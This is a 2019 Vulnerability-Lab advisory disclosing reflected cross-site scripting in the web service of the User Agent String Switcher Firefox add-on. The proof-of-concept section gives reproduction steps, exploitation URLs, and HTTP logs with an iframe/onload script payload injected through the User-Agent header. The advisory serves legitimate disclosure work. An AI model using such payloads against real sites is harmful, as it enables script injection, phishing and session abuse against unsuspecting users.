Share
Document Title:
===============
User Agent String Switcher Service - XSS Vulnerabilities


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2189


Release Date:
=============
2019-08-14


Vulnerability Laboratory ID (VL-ID):
====================================
2189


Common Vulnerability Scoring System:
====================================
4


Vulnerability Class:
====================
Cross Site Scripting - Non Persistent


Current Estimated Price:
========================
500€ - 1.000€


Product & Service Introduction:
===============================
This extension allows you to reliably spoof your browser "User-Agent" string to a custom one. The extension provides 
a list of all well-known "User-Agent" strings for different browsers and operating systems.

(Copy of the Homepage:  https://addons.mozilla.org/de/firefox/addon/user-agent-string-switcher/  & https://webbrowsertools.com/useragent/ )


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple client-side cross site vulnerabilities in the User Agent String Switcher online web service.


Vulnerability Disclosure Timeline:
==================================
2019-08-14: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Authentication Type:
====================
No authentication (guest)


User Interaction:
=================
Low User Interaction


Disclosure Type:
================
Independent Security Research


Technical Details & Description:
================================
Multiple client-side cross site vulnerabilities has been discovered in the User Agent String Switcher online web service. 
The vulnerability allows to inject own malicious script code to client-side browser requests.

The vulnerability is located in the input field of the browser switcher user agent. The user agent input field 
can be used to inject malicious script code. After the inject the app allows to perform a test using the mozilla 
developer webbrowsertools.com domain. At the domain service the user has the ability to preview his own actual 
new setup user agent client (./useragent/). The malicious execution of the script code takes place in the affected 
window.navigator, ua-parser-js and platform.js. The request is performed using GET ?method=normal&verbose=false&r.

The vulnerability can be used to trigger a remote cross site scripting issue with low required user interaction.
Inject of malformed or malicious script codes allows attackers to external redirect, attack via cross site request 
forgery, phishing attempts or non-persistent further manipulation of the affected web module context.

Mozilla Extension:
[+] User Agent String Switcher (https://addons.mozilla.org/de/firefox/addon/user-agent-string-switcher/)

Web Service of Extension:
[+] User Agent String Switcher Web Service (https://webbrowsertools.com/useragent/)

Affected File(s):
window.navigator
ua-parser-js v0.7.19
platform.js v1.3.3


Proof of Concept (PoC):
=======================
The security web vulnerability can be exploited by local and remote attackers with low user interaction(click).
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.


Manual steps to reproduce (Local) ...
1. Open the mozilla web browser
2. Install the user agent string switcher addon for mozilla
3. Open it and inject the test payload or your test script code to the user agent input field at the buttom of the addon
4. Apply the settings and open the test page
5. Switch with the tab through the affected file types
6. Successful reproduce of the vulnerability!


Manual steps to reproduce (Remote) ...
1. Prepare a get method request with the local injection description above
2. Copy the links with the correct r parameter to display the contents and execute the script code on client-side
3. Successful reproduce of the vulnerability!


PoC Web Urls: Exploitation
https://webbrowsertools.com/useragent/?method=normal&verbose=false&r=0.2528440576064094
https://webbrowsertools.com/useragent/?method=normal&verbose=false&r=0.2528440576064094
https://webbrowsertools.com/useragent/?method=normal&verbose=false&r=0.4067375366054382


PoC: Attacker Browser Settings (Exp. User Agent Payload)
Host: www.vulnerability-lab.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:62.0) <[INJECTED SCRIPT CODE PAYLOAD!]>Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: PHPSESSID=idtvmbt3io7q6pd6n0gn


--- PoC Session Logs ---
platform.js
https://unpkg.com/platform@1.3.5/platform.js
Host: unpkg.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:62.0) <iframe src=evil.source onload=alert(document.domain)></iframe>Gecko/20100101 Firefox/62.0
Accept: */*
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://webbrowsertools.com/
GET: HTTP/2.0 200 OK
content-type: application/javascript; charset=utf-8
vary: Accept-Encoding
access-control-allow-origin: *
etag: W/"9eef-dbZwW8lUf+koS79YPLDTa/M/XUE"
age: 315114
cache-control: public, max-age=31536000
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-content-type-options: nosniff
server: cloudflare
content-encoding: br
X-Firefox-Spdy: h2
- ua-parser.js
https://unpkg.com/ua-parser-js@0.7.19/src/ua-parser.js
Host: unpkg.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:62.0) <iframe src=evil.source onload=alert(document.domain)></iframe>Gecko/20100101 Firefox/62.0
Accept: */*
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://webbrowsertools.com/
GET: HTTP/2.0 200 OK
content-type: application/javascript; charset=utf-8
vary: Accept-Encoding
access-control-allow-origin: *
etag: W/"ca6c-WNn+CdwU63oH9i+AYovEdlMEJEU"
cache-control: public, max-age=31536000
age: 549107
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-content-type-options: nosniff
content-encoding: br
X-Firefox-Spdy: h2
Content-Security-Policy: upgrade-insecure-requests
- navigator
Host: developer.mozilla.org
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:62.0) <iframe src=evil.source onload=alert(document.domain)></iframe>Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://webbrowsertools.com/


Reference(s):
https://developer.mozilla.org/docs/Web/API/Window/navigator
https://unpkg.com/ua-parser-js@0.7.19/src/ua-parser.js
https://unpkg.com/platform@1.3.5/platform.js

https://developer.mozilla.org/docs/Web/API/Window/navigator
https://github.com/faisalman/ua-parser-js
https://github.com/bestiejs/platform.js/


Security Risk:
==============
The security risk of the client-side input validation web vulnerability in the webtools service of the addon is estimated as medium.


Credits & Authors:
==================
Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab 
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits 
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do 
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. 
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains:    www.vulnerability-lab.com		www.vuln-lab.com				www.vulnerability-db.com
Services:   magazine.vulnerability-lab.com	paste.vulnerability-db.com 			infosec.vulnerability-db.com
Social:	    twitter.com/vuln_lab		facebook.com/VulnerabilityLab 			youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php 	vulnerability-lab.com/rss/rss_upcoming.php 	vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php 	vulnerability-lab.com/register.php  vulnerability-lab.com/list-of-bug-bounty-programs.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other 
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or 
edit our material contact (admin@ or research@) to get a ask permission.

				    Copyright © 2019 | Vulnerability Laboratory - [Evolution Security GmbH]™